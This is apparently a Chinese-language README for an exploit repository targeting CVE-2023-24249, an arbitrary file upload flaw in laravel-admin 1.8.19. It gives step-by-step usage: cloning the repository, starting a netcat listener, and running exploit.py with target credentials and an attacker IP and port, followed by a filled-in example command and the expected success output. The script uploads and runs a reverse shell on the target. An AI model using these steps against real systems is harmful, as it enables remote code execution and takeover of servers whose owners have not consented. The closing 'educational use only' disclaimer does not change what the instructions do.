本仓库包含针对 CVE-2023-24249 的漏洞利用脚本,该漏洞存在于 laravel-admin 1.8.19 版本中,属于严重漏洞。此漏洞允许任意文件上传,使攻击者能够通过构造的 PHP 文件执行任意代码。该利用脚本演示了攻击者如何向目标应用上传反向 Shell 并执行以获取远程访问权限。
CVE-2023-24249 是 laravel-admin v1.8.19 中的一个任意文件上传漏洞。该漏洞允许攻击者上传并执行任意 PHP 文件,从而导致潜在的远程代码执行。
所提供的漏洞利用脚本可自动执行利用 CVE-2023-24249 的过程。具体步骤如下:
requests 库beautifulsoup4 库使用 pip 安装所需库:
pip install requests beautifulsoup4
克隆仓库:
git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
cd CVE-2023-24249-Exploit
在您的机器上启动监听器:
nc -lvnp <PORT>
运行漏洞利用脚本:
python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -i <YOUR_IP> -p <YOUR_PORT>
将 <TARGET_URL>、<USERNAME>、<PASSWORD>、<YOUR_IP> 和 <YOUR_PORT> 替换为适当的值:
<TARGET_URL>:目标应用的 URL。<USERNAME>:用于身份验证的用户名。<PASSWORD>:用于身份验证的密码。<YOUR_IP>:用于接收反向 Shell 连接的 IP 地址。python3 exploit.py -u http://admin.iduzzel.com -U admin -P iduzzel -i 10.10.14.13 -p 1337
如果漏洞利用成功,脚本将输出:
[+] Reverse shell uploaded successfully! Attempting to execute it...
[+] Reverse shell executed successfully! Check your listener at <YOUR_IP>:<YOUR_PORT>
此脚本仅供教育目的使用。未经明确许可,针对任何系统使用此脚本均属非法且不道德的行为。作者不对因使用此脚本而造成的任何滥用或损害承担责任。
<YOUR_PORT>:您的监听器正在运行的端口。